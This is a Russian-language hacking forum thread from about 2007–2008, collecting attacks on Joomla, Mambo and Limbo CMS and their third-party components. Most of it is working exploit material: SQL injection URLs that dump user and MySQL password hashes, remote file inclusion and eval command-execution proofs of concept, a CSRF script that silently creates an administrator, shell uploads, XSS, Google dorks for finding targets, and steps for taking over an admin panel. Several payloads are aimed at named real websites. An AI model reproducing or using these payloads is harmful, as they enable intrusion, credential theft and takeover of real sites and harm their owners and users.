CMS Joomla!

Хочу начать обзор со слов, что как бы Joomla не считалась одной из самых уязвимых CMS, на мой взгляд, Joomla очень даже не плохой движок со стороны безопасности. Проблема заключается в сторонних компонентах подключаемых к движкам и разработанных левыми (не разработчиками Джумлы) разработчиками. Но блогодаря сторонним компонентам эта CMS становиться интересной «изнутри» (в администраторской панели).

Доступ в администраторскую панель:
Здесь я коснусь двух найденных мною уязвимостей в Джумле.

1. Компонент SimpleFaq 2.х (com_simplefaq) *

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в параметре aid в установочном сценарии Joomla index.php (когда параметр \"option\" установлен в com_simplefaq и параметр task установлен в answer). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. (c) securitylab.ru

* я позже узнал, что эта уязвимость была найдена до меня

Уязвимые версии 2.х – 2.40

Внешний вид:
http://efots.info/images/10913601.gif

При запросе:
http://victim.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0/**/from/**/jos_users/*
Вежливо выдает логин, хеш (md5) и мыло:
http://efots.info/images/18549402.gif

Теперь остаётся расшифровать хеш и проходить в администраторскую панель.

Таким же образом можно получить доступ к БД MySQL, запросом:
http://victim.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,User,Password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/mysql.user/*

Ну и соответственно наш милый браузер выдаст следующее:
http://efots.info/images/71574103.gif


2. Компонент ReMOSitory 341RE (com_remository) *
Уязвимость существует из-за недостаточной обработки загружаемых файлов на сервер, и наличия прямого доступа к ним по дефолту.

* Данной уязвимости еще нигде не встречал

Внешний вид:
http://efots.info/images/67777804.gif

Теперь регистрируемся, и идем заливать файл (в нашем случае это шел))) по ссылке «Добавить файл»

После того как файл добавлен он автоматически загружается во временное хранилище (/downloads/uploads/), до одобрения администратора. Но мы ждать не будем и последуем по ссылке http://victim.com/downloads/uploads/ и увидим следующее:
http://efots.info/images/21416405.gif

Открываем... А дальше совсем другая история, которую не раз поднимали в пределах форума.

Администраторская панель.

Вот мы и добрались до намеченной цели, но мало попасть сюда, нужно еще и иметь доступ на добавление/редактирование/удаление файлов. Для этого есть два варианта:

1. В большинстве случаях (на моей практике это 95/100) доступны на запись следующие папки:

media/
administrator/components/
components/
images/stories/
administrator/modules/
modules/
language/
mambots/

А это гуд! Теперь не раздумывая, идем следующим путем: Установка/удаление => Компоненты. И смотря оттого, что именно нужно (а иногда нужно именно всё) устанавливаем следующие компоненты:

JoomlaXplorer 2.0 – подобие FTP сервера с возможностью установки прав на файлы, загрузка/редактирование/удаление файлов. Скрин:
http://efots.info/images/79943006.gif

Причем как можно заметить из скрина доступ обеспечивает не только на директорию сайта, но и если здесь же хостятся другие, то и к другим)))

JoomlaPack 1.1.0 – Компонент для создания архива данных (бэкап БД и Полный бэкап сайта с установочными файлами)
http://efots.info/images/54737907.gif

Здесь ничего сложного нет, просто идем по ссылке «Создать архив сайта», выбираем, что именно нужно создать (архив БД или архив сайта), создаем, потом идем по ссылке «Сохраненные архивы сайта» и скачиваем.

Теперь сайт под нашим чутким руководством)))

2. Использования шелла для поднятия рутовских прав, по этой возможности много статей можно найти пройдя по ссылке www.google.com

На этом всё. Ответственность за использования данной статьи предусмотрено Уголовным Кодексом Российской Федерации. Тема создана в познавательных целях.

JoomlaXplorer 2.0 – тут (http://dump.ru/files/m/m4960353436/)
JoomlaPack 1.1.0. – тут (http://dump.ru/files/m/m715618744/)

Подборка сплоитов для CMS Joomla! И сторонних компонентов – тут (http://dump.ru/files/m/m5557530211/) – сплоиты (с) milw0rm.com

P.S. И помните каким бы ни был взлом, главное что бы он был безопасным (с) Анфиса Чехова

it's my (с) 2007

=НЕ ФЛЕЙМИТЬ=

Для того чтобы было легче понять - Joomla - Это как бы 5ая версия Мамбы, которую решили нумеровать и назвать заново.

Насчет узнавания версии в последних релизах вопрос затруднительный.
Файл CHANGELOG.php может просматривать только админ, /includes/version.php тоже недотсупен на чтение. только инклудиься в файлы админки. installation/index.php - обычно удаляется.
Смотрю более старые версии.


Множество модулей для джумлы - мамбы страдают удаленнм - локальным инклудом файлов.
Все из-за того, что переменная
$mosConfig_absolute_path которая инклудится в практически каждом файле никак не проверяется.
Точный список модулей и версий скоро будет готов.


4.5.2.1
mysql >4.1 (Использует подзапросы)
Bug:
/index.php?option=com_content&task=vote&id=1&Itemid=1&cid=1&user_rating=1,rating_sum=[sql]
Mambo 4.5.2.1 hash pass disclosur (http://milw0rm.com/exploits/1049)
Mambo 4.5.2.1 by RST (http://milw0rm.com/exploits/1061)

4.6rc1
Уязвимость в модуле com_frontpage, использует посимвольный benchmark брут полей.
Mambo <= 4.6rc1 'Weblinks' blind SQL injection (http://milw0rm.com/exploits/1920)

1.0
RFI - http://targetsite.com/[path_to_Joomla!]/includes/joomla.php?includepath=[attacker]
(c) http://packetstormsecurity.org/0606-exploits/joomla10.txt


1.0.7
Уязвимость в модуле com_rss, позволяющая провести дос атаку, путь, а также создавать произвольные файлы.
Mambo/Joomla Path Disclosure & Remote DOS Exploit (http://milw0rm.com/exploits/1698)
Создание файла: index.php?option=com_rss&feed=[имя файла]&no_html=1
Путь: index.php?option=com_rss&feed=/&no_html=1
DoS: index.php?option=com_poll&task=results&id=1&mosmsg=DOS@HERE<<>AAA<><>
(с) bugs discovered by Foster (RST/GHC)
В 1.0.8 все исправлено. Также как я посмотрел в этой версии с $mosmsg можно провести xss атаку, фильтр includes/phpInputFilter/class.inputfilter.php пропускает половину тэгов.


1.0.9
Уязвимость в модуле com_frontpage, использует посимвольный benchmark брут полей.
Joomla <= 1.0.9 'Weblinks' blind SQL injection (http://milw0rm.com/exploits/1922)


1.0.10
Уязвимость в com_poll, позволяющая "накрутить" тот или иной вариант ответа
Joomla add unlimited votes (http://milw0rm.com/exploits/2219)


1.5.0
Уязвимость поволяет выполнять произвольные команды на сервере
PoC: http://hacked/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://hacker/?
Joomla! 1.5.0 Remote file include (http://milw0rm.com/exploits/3781)


1.5 - 1.5 beta 2
Уязвимость позволяет удаленно выполнять комманды на сервере.
Уязвимый код:

1) components/com_search/views/search/tmpl/default_results.php

line 12: <?php eval ('echo "'. $this->result .'";'); ?>

2) templates/beez/html/com_search/search/default_results.php

line 25: echo '<p>' . eval ('echo "' . $this->result . '";');

Poc
http://$joomlahost/index.php?searchword=";phpinfo();%23&option=com_search&Itemid=1
http://$joomlahost/index.php?c=id&searchword=";system($_GET[c]);%23&option=com_search&Itemid=1Remote command execution in Joomla! CMS 1.5 beta 2 (http://milw0rm.com/exploits/4212)



1.5 beta 1,2 + RC1
Уязвимость присутствует в модуле com_contentв трех файлах archive.php,category.php,section.php в параметре filter,
Joomla! 1.5 Beta1/Beta2/RC1 Remote SQL Injection Exploit (http://milw0rm.com/exploits/4350)


Все версии
./administration/ sql injection
http://packetstormsecurity.org/0707-exploits/joomla-sql.txt
PoC:
administrator/popups/pollwindow.php?pollid=1%20union%20select%20passwor d%20from%20jos_users/*

Раскрытие пути:
includes/Cache/Lite/Output.php
includes/patTemplate/patTemplate/Stat.php
includes/patTemplate/patTemplate/OutputFilter.php
includes/patTemplate/patTemplate/OutputCache.php
includes/patTemplate/patTemplate/Modifier.php
includes/patTemplate/patTemplate/Reader.php
includes/patTemplate/patTemplate/TemplateCache.php

Заливка шела в 1.5.* версиях.
1.Заходим в админку http://joomla/administrator/
2. направляемся в компонент инстала-апгрейда
http://joomla/administrator/index.php?option=com_installer
3. Выбираем любой файл в Upload Package File и заливаем его =)
Он будет находитсья в http://joomla/tmp/

Инклуды в модах/модулях/компонентах

Обновлено: 12.01.2008

Софтинка для автоматического чека инклудов прилагается в атаче.

добавлен скрипт удаления повторов и сортировки по алфавиту

sql в гостевой книге (модуль com_akobook)
v. <=3.42
/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=[sql]

примеры: (вывод в цитатах)
http://www.raznyeludi.com/component/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19/*

http://games.etherway.ru/index.php?option=com_akobook&Itemid=91&func=sign&action=reply&gbid=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19+from+information_schema.tabl es/*

итд
ps для танкистов /itemid,1/ = &itemid=1

VULN: /multithumb.php
BUG: include_once($mosConfig_absolute_path."/mambots/content/multithumb/class.img2thumb.inc");
(с) http://www.rootshell-team.com/showthread.php?t=2969

CBSMS Mambo Module <= 1.0 ([mosConfig_absolute_path])

# http://www.site.com/[path]/mod_cbsms_messages.php?mosConfig_absolute_path=[evil script]

Как узнать версию Joomla?

Файл configuration.php-dist лежит в корне и сам себя описывает так:


* -------------------------------------------------------------------------
* ЭТОТ ФАЙЛ ДОЛЖЕН ИСПОЛЬЗОВАТЬСЯ ТОЛЬКО ПРИ НЕВОЗМОЖНОСТИ WEB-ИНСТАЛЛЯТОРА
*
* Если вы устанавливаете Joomla вручную, то есть не используете web-инсталлятор,
* то переименуйте этот файл в configuration.php
*
* Например:
* UNIX -> mv configuration.php-dist configuration.php
* Windows -> rename configuration.php-dist configuration.php
*
* Теперь отредактируйте этот файл и установите параметры вашего сайта
* и базы данных.
* -------------------------------------------------------------------------

Проблема, однако, состоит в том, что в 9 из 10 случаев файл переименовать либо забывают, либо просто не считают нужным.

Примеры тому

http://www.joomla.org/configuration.php-dist

http://www.joomla.ru/configuration.php-dist

Между тем, файл содержит чувствительную информацию, позволяющую узнать версию установленного пакета. Так, если установлена

версия 1.0.13, файл содержит строчку:

* @version $Id: configuration.php-dist 7424 2007-05-17 15:56:10Z robs $

версии 1.0.11, 1.0.12

* @version $Id: configuration.php-dist 4802 2006-08-28 16:18:33Z stingrey $

версии 1.0.9, 1.0.10

* @version $Id: configuration.php-dist 3754 2006-05-31 12:08:37Z stingrey $

версия 1.0.8

* @version $Id: configuration.php-dist 2622 2006-02-26 04:16:09Z stingrey $

версии 1.0.5-1.0.7

* @version $Id: configuration.php-dist 506 2005-10-13 05:49:24Z stingrey $

версия 1.0.4

* @version $Id: configuration.php-dist 217 2005-09-21 15:15:58Z stingrey $

версия 1.0.3

* @version $Id: configuration.php-dist 506 2005-10-13 05:49:24Z stingrey $

версии 1.0.1, 1.0.2

* @version $Id: configuration.php-dist 217 2005-09-21 15:15:58Z stingrey $

версия 1.0.0

* @version $Id: configuration.php-dist 47 2005-09-15 02:55:27Z rhuk $

Уязвимость в поиске по сайту в параметре searchword. Дыра является DOM based XSS.

http://site/index.
php?option=com_search&searchword=';alert('XSS')//

Для исполнения кода, пользователь должен сменить количество результатов поиска на одну страницу.
уязвимы версии Joomla! <= 1.0.13

а если так:
* @version $Id: configuration.php-dist,v 1.4 2005/11/25 04:46:26 csouza Exp $

какая версия?

смахивает на 1.4 но както меня напрягают числа, в списке выше 2005\10 - это уже 1.5

BlackCats, это у тебя какое-то Mambo (не из последних)... На счёт конкретной версии, сейчас, к сож. ответить не могу. Пока выкладываю данные для

Joomla 1.5.x

1.5.0 Release Candidate 3

* @version $Id: configuration.php-dist 8946 2007-09-18 14:26:22Z louis $

1.5.0 Release Candidate 2

* @version $Id: configuration.php-dist 8290 2007-08-01 14:03:11Z jinx $

1.5.0 Release Candidate 1

* @version $Id: configuration.php-dist 7740 2007-06-13 21:01:25Z laurens $

1.5.0 Beta 2

* @version $Id: configuration.php-dist 6691 2007-02-21 09:29:26Z Jinx $

1.5.0 Beta

* @version $Id: configuration.php-dist 5361 2006-10-07 19:21:08Z Jinx $

дополнение к com_remository
активнаяя xss если можно оставлять коментариии к файлам
xttp://localhost/index.php?option=com_remository&Itemid=30&func=fileinfo&id=4
и при загрузке файла иногда работает пхп инекция
в "Заголовок:" пишем ";phpinfo();//"
<input class='inputbox' type='text' id='filetitle' name='filetitle' size='25' value='' />

Joomla Component JUser 1.0.14 Remote File Inclusion Vulnerability (http://www.milw0rm.com/exploits/4636)

позавчера нашёл вроде в паблике нету
компонент com_joomradio
google->inurl:com_joomradio inurl : option всего 452 маловато
http://poosk.fm/index2.php?option=com_joomradio&page=show_radio&id=4+and+1=0+union+select+1,concat(username,0x3a,p assword),3,4,5,6,7+from+jos_users+where+gid=25+or+ gid=24/*

milw0rmv: Mambo/Joomla Component rsgallery <= 2.0b5 (catid) SQL Injection Vuln (http://milw0rm.com/exploits/4691)

В догонку хочется сказать, что на Mambo перфикc mos_, на Joomla jos_

Mambo:
index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat(username,0x3a,passwo rd),6,7,8,9,10,11+from+mos_users--

Joomla:
index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat(username,0x3a,passwo rd),6,7,8,9,10,11+from+jos_users--

Dork:
Google : "option=com_rsgallery" или inurl:"index.php?option=com_rsgallery"

очень часто в жомле встречается xss но есть проблема сесия жывёт 30 минут поэтому написал активный снифер сначала снифер пытается залить шелл если не получится залить шелл создаётся новый админ

http://slil.ru/25290482

тестил на Joomla 1.0.12

LIMBO CMS (Lite mambo)

Blind sql-inj

сплоент:http://site/index.php?option=polls&Itemid=0&pollid=[id]/**/and/**/[подзапрос]
где [id] - реально существующий id голосования, [подзапрос] - логическое выражение

на данный момент уязвимы сайты тех. поддержки:
http://limbo-cms.com.ru/index.php?option=polls&Itemid=0&pollid=177/**/and/**/user()=0x746172656C6B615F61646D696E406C6F63616C686 F7374
http://www.limboportal.com/index.php?option=polls&Itemid=0&pollid=26/**/and/**/1=1
при неправильном варианте, голосование не отображается, т.к. префикс по умолчанию выбирается случайным образом, вместо префикса при выборке в подзапросе надо указывать после FROM %23__[имя таблицы], где [имя таблицы] - имя таблицы без префикса например:
http://www.xtreme.kz/index.php?option=polls&Itemid=0&pollid=26/**/and/**/substring((SELECT/**/1/**/from/**/%23__users),1,1)=1

iJoomla Magazine

Blind sql-inj

сплоент:http://site/index2.php?option=com_magazine&func=show_magazine&id=[id]+and+[подзапрос]
где [id] - реально существующий id страницы, [подзапрос] - логическое выражение

на данный момент уязвимы сайты производителя:
http://www.ijoomla.com/index2.php?option=com_magazine&func=show_magazine&id=7+and+substring((select+username+from+jos_users +limit+1,1),1,1)=0x21&Itemid=91
при неправильном варианте отображается другая страница


З.Ы. Нашел сам, так что если вдруг боян, сильно не пинайте, это просто означает, что у вас больше информации чем у меня

с префексом можно не париться, может кто смотрел исходники тот может и заметил что префик обозначается "#__" потом строка передаётся функции setQuery кторая и заменяет "#__" на нужный, выглядеть будет так %23__users

с префексом можно не париться, может кто смотрел исходники тот может и заметил что префик обозначается "#__" потом строка передаётся функции setQuery кторая и заменяет "#__" на нужный, выглядеть будет так %23__users

Да ты прав, правда на сайте limbo-cms.com.ru это не прокатывает, незнаю почему, а вот на других сайтах работает, но вобщето мож мы с тобой разные версии смотрели, запрос передается не в setQuery а в функцию Execute, которая собственно и заменяет #__ на префикс

работает в том случае если производители сторонних компонентов используют стандартные функции жомлы для общения с базой данных бывают и исключения, но в 90% работает

//Exploit

http://server.com/Path/index.php?option=com_puarcade&Itemid=92&fid=-1%20union%20select%20concat(username,0x3a,password )%20from%20jos_users--

//Текст для поиска:

inurl:index.php?option=com_puarcade
inurl:/option,com_puarcade/

(c) (http://www.milw0rm.com)

com_serverstat (компонент Mambo & Joomla)
/Этот компонент используеться для отображения статистики игровых серверов/

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии шаблона administrator/components/com_serverstat/templates/template.game.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Переменная переданная через GET запрос используеться include. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP.
Пример:
http://[host]/administrator/components/com_serverstat/templates/template.game.php?mosConfig_absolute_path=[http://file]
...........................................
а также:
в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_serverstat/install.serverstat.php
Пример:
http://[host]/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=[http://file]

com_serverstat (компонент Mambo & Joomla)
Ну тогда ещё упомянем, что там есть и активная XSS - В поле ника игрока. Если не хватит символов для полноценной атаки (не помню сколько в ник влазит), то можно закончить ник вот так:<!--, потом войти ещё одним игроком в игру с ником начинающимся на --> ну и так далее, до тех пор пока не хватит места...

Severity
========
Mild. It requires an administrator to be logged in and to be tricked into a specially
crafted webpage.
<script type="text/javascript">
window.onload = function() {
var url = "http://joomlasite.com/joomla/administrator/index2.php";
var gid = 25;
var user = 'custom_username';
var pass = 'custom_password';
var email = 'joe_cool (at) example (dot) com [email concealed]';
var param = {
name: user,
username: user,
email: email,
password: pass,
password2: pass,
gid: gid,
block: 0,
option: 'com_users',
task: 'save',
sendEmail: 1
};
var form = document.createElement('form');
form.action = url;
form.method = 'post';
form.target = 'hidden';
form.style.display = 'none';
for (var i in param) {
try {
// ie
var input = document.createElement('<input name="'+i+'">');
} catch(e) {
// other browsers
var input = document.createElement('input');
input.name = i;
}
input.setAttribute('value', param[i]);
form.appendChild(input);
}
document.body.appendChild(form);
form.submit();
}
</script>
<iframe name="hidden" style="display: none"></iframe>
<img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg">

PS добавляет нового админа с заданным логином, пассом и мылом, если кто не понял...

Flash Component Multiple Remote File Inclusion

Vulnerable: 2.5.1, 2.5.2

Exploit:


http://sito.it/administrator/components/com_joomla_flash_uploader/install.joomla_
flash_uploader.php?mosConfig_absolute_path=shell?

http://sito.it/administrator/components/com_joomla_flash_uploader/uninstall.jooml
a_flash_uploader.php?mosConfig_absolute_path=shell ?

Joomla Component NeoRecruit

SQL:
http://[сайт]/index.php?option=com_neorecruit&task=offer_view&id=[SQL инъекция]

Пример:
http://www.sepangaircraft.com/index.php?option=com_neorecruit&task=offer_view&id=36985

2+UNION+SELECT+1,concat(username,0x3a,password),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,

20,21,22,23,24,25+FROM+jos_users--

Joomla Component Nice Talk

SQL:
http://[сайт]/index.php?option=com_nicetalk&tagid=[SQL инъекция]

Пример:
http://www.diariometropolitano.com/rmbs/index.php?option=com_nicetalk&tagid=-1)+UNION+

SELECT+1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,p assword),12,13,14,15,16,17,18+FROM+jos_use

rs--


Joomla перфикс jos_
Mamba перфикс mos_

Remote File Inclusion

Vulnerable: com_panoramic version 1.0

PoC:


http://localhost/path/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=[evilcode]


Remote File Inclusion

Vulnerable: MOSMediaLite451

PoC:


http://www.site.net/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=[shell]
http://www.site.net/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=[shell]
http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=[shell]
http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=[shell]
http://www.site.net/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=[shell]
http://www.site.net/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=[shell]

Mambo Component Newsletter (listid) Remote SQL Injection

SQL Injection:

index.php?option=com_newsletter&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*

Для поиска вводим:

allinurl: "com_newsletter"


Mambo Component Fq (listid) Remote SQL Injection

SQL Injection:

index.php?option=com_fq&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*

Для поиска вводим:

allinurl: "com_fq"


Mambo Component MaMML (listid) Remote SQL Injection

SQL Injection:

index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*

Для поиска вводим:

allinurl: "com_mamml"


Mambo Component Glossary 2.0 (catid) SQL Injection

SQL Injection:

index.php?option=com_glossary&func=display&Itemid=s@bun&catid=-1%20union%20select%201,username,password,4,5,6,7,8 ,9,10,11,12,13,14%20from%20mos_users-

Для поиска вводим:

allinurl: "com_glossary"

(c) (ttp://www.hackturkiye.com/)

Mambo Component musepoes (aid) Remote SQL Injection

SQL Injection:

index.php?option=com_musepoes&task=answer&Itemid=s@bun&catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a,0x3a,3,0,0x3a,0,4,4,4,0,0 x3a,0,5,5,5,0,0x3a/**/from/**/mos_users/*

Для поиска вводим:

allinurl: "com_musepoes"


Mambo Component buslicense (aid) Remote SQL Injection

SQL Injection:

index.php?option=com_buslicense&sectionid=9999&Itemid=9999&task=list&aid=-1/**/union/**/select/**/0,username,0x3a,password,4,5,6,7,8,9,10,11,12,13,1 4/**/from/**/mos_users/*

Для поиска вводим:

allinurl: "com_buslicense"


Mambo Component Recipes 1.00 (id) Remote SQL Injection

SQL Injection:

index.php?option=com_recipes&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),username,0x3a,5 ,6,7,8,9,10,11,12,0x3a,0x3a,0x3a,username,username ,0x3a,0x3a,0x3a,21,0x3a/**/from/**/mos_users/*

Для поиска вводим:

allinurl: "com_recipes"


Mambo Component jokes 1.0 (cat) SQL Injection

SQL Injection:

index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*

Для поиска вводим:

allinurl: "com_jokes"


Mambo Component EstateAgent 0.1 Remote SQL Injection

SQL Injection:

index.php?option=com_estateagent&Itemid=S@BUN&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=S@BUN

Для поиска вводим:

allinurl: "com_estateagent"

(c) (http://www.hackturkiye.com/)

Component Catalogshop 1.0b1 SQL Injection Vulnerability

inurl: index.php?option=com_catalogshop
Инъекция: index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password), 3,4,5,6,7,8,9,10,11,12,13+from+mos_users--
http://www.uralmetall.com/index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password), 3,4,5,6,7,8,9,10,11,12,13+from+mos_users--

Component AkoGallery 2.5b SQL Injection Vulnerability

inurl: index.php?option=com_akogallery
Инъекция:
index.php?option=com_akogallery&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+fr om+mos_users--
http://brodnica.com.pl/powiat/index.php?option=com_akogallery&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+fr om+mos_users--

(с) hackturkiye.com

SQL-инъекция в Mambo Component Restaurant

Программа: Mambo Component Restaurant 1.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:index.php?option=com_restaurant&Itemid=S@BUN&func=detail&id=-1/* */union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/* */from/**/mos_users/*

(c) (xakep.ru)

скуль в Garyґs Cookbook 2.3.4 другие версии не смотрел

google: inurl:option inurl:com_garyscookbook (всего 251,000 )

POST http://localhost/joomla/index.php HTTP/1.0
Accept: */*
Referer: http://localhost/joomla/index.php?option=com_garyscookbook&Itemid=&func=detail&id=1
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Opera 9.95
Host: localhost
Content-Length: 95
Pragma: no-cache

option=com_garyscookbook&Itemid=&func=vote&imgvote=4&id=1,(select username from %23__users where gid=25 or gid=24 limit 1))%23


запрос к бд
INSERT INTO jos_gkb_voting_log (type,date,userid,fileid,ipaddress) VALUES ('3','2008-00-00 00:00:00', 0,[sql],'127.0.0.1');

результаты запроса нигде не отоброжаются
единственный способ эксплуатации посимвольный перебор
p.s. шыпко геморойно дальше не стал ковырять, если у кого получется добавить insert или update плиз отпишытесь

Component NeoReferences 1.3.1 (catid) SQL Injection Vulnerability

inurl: index.php?option=com_neoreferences
Инъекция: index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*
http://www.islamicamagazine.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*

Mambo Component Mambads 1.5 Remote SQL Injection
inurl: index.php?option=com_mambads
Инъекция: index.php?option=com_mambads&Itemid=0&func=detail&cacat=0&casb=0&caid=100500+union+select+null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, concat(username,0x3a,password),null,null,null,null ,null,null,null+from+mos_users--
http://www.vivalavida.org/index.php?option=com_mambads&Itemid=0&func=detail&cacat=0&casb=0&caid=100500+union+select+null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, concat(username,0x3a,password),null,null,null,null ,null,null,null+from+mos_users--

(c) hackturkiye.com

Mambo Component SOBI2 RC 2.5.3 SQL Injection Vulnerability

PoC:


http://site.com/path/index.php?option=com_sobi2&Itemid=27&catid=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*

Mosets Hot Property v0.9.6

magic_quotes_gpc off
register_globals on

http://localhost/joomla/components/com_hotproperty/pdf.php?id=10'+and+1=0+union+select+1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,concat(u sername,0x3a,password),1+from+%23__users+where+gid =25+or+gid=24+limit+1/*

Joomla Component mosDirectory 2.3.2 (catid) Remote SQL Injection Vulnerability

/index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*

Поиск бажного компонента: inurl:index.php?option=com_directory
Автор: aNa TrYaGi
Источник: milw0rm.com [2008-02-03]

Joomla Component Markplace 1.1.1 Remote Sql Injection Exploit

Автор: SoSo H H (Iraqi-Cracker)
Tested on: Markplace Version 1.1.1 and 1.1.1-pl1
Поиск бажного компонента:
"Marketplace Version 1.1.1"
"Marketplace Version 1.1.1-pl1"
inurl:index.php?option=com_marketplace
Exploit:index.php?option=com_marketplace&page=show_category&catid=(SQL)
Пример:(SQL)=-1+union+select+concat(username,0x3a,password),2,3+ from+jos_users/*
milw0rm.com (http://milw0rm.com/exploits/5055) [2008-02-03]



----------------------------------------------------
HOME : http://www.hackturkiye.com/
AUTHOR : S@BUN :
joomla SQL Injection(com_awesom)

DORKS 1: allinurl :"com_awesom"
EXPLOIT:index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null ,null,null,null,null/**/from/**/mos_users/*


<name>Awesom</name>
<creationDate>24/05/2004</creationDate>
<author>Madd0</author>
<copyright>This component is released under the GNU/GPL License</copyright>
<authorEmail>madd0@users.sourceforge.net</authorEmail>

<authorUrl>amazoop.sourceforge.net</authorUrl>
<version>0.3.2</version>
<description>Awesom!, or Amazon Web Services for Opensource Mambo, is a component that lets you create lists of products to feature on your Mambo-driven site.<br />
These lists can be customized or can be automatically generated with information provided by Amazon through Amazon Web Services.<br />
Additionally, if you are an Amazon associate, you can configure Awesom to link to Amazon
using your associate ID in order to earn comissions.
</description>

milw0rm (http://milw0rm.com/exploits/5058)

joomla SQL Injection(com_shambo2)

DORKS 1: allinurl :"com_shambo2"
EXPLOIT:index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cconcat(username,0x3a,password)%2C0%2C0% 2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F %2A%2A%2Ffrom%2F%2A%2A%2Fmos_users

milw0rm (http://milw0rm.com/exploits/5059)

joomla SQL Injection(com_downloads)(filecatid)

DORKS 1: allinurl :"com_downloads"filecatid
EXPLOIT:index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3 a,password),concat(username,0x3a,password)/**/from/**/mos_users/*

milw0rm (http://milw0rm.com/exploits/5073)

Joomla Component Ynews 1.0.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:/index.php?option=com_ynews&Itemid=0&task=showYNews&id=-1/* */union/**/select/**/0,1,2,username,password,5,6%20from%20jos_users/*

xakep.ru (http://www.xakep.ru/post/42242/default.asp)

Component Ynews 1.0.0 SQL Injection Vulnerability

inurl: index.php?option=com_ynews
Инъекция: index.php?option=com_ynews&Itemid=0&task=showYNews&id=-1+union+select+0,1,2,concat(username,0x3a,password ),null,5,6+from+jos_users/*
http://www.newpowersoul.de/index.php?option=com_ynews&Itemid=0&task=showYNews&id=-1+union+select+0,1,2,concat(username,0x3a,password ),null,5,6+from+jos_users/*

(c) milw0rm.com

